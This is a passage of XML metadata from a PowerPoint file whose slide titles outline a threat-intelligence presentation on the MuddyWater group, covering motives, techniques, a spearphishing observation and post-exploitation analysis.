      <vt:lpstr>MuddyWater </vt:lpstr>
      <vt:lpstr>Associated</vt:lpstr>
      <vt:lpstr>MOTIVES</vt:lpstr>
      <vt:lpstr>Techniques </vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Software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2021</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>During our research, we observed a spearphishing email allegedly from a government agency.</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Post-Exploitation Analysis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Trend Micro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Admin</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-29T10:01:49Z</dcterms:modified>
</cp:coreProperties>
</file>